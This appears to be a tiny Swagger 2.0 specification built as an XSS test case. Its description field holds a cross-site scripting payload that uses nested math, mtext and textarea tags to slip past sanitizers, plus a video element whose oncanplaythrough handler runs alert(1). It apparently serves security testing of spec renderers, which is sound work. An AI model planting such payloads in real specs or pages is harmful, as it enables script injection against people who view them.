swagger: '2.0'
info:
  title: XSS test
  description: <math><mtext><h1><a><h6></a></h6><textarea></textarea>"<video oncanplaythrough=alert(1)><source src="validvideo.mp4" type="video/mp4"></video>
  version: production
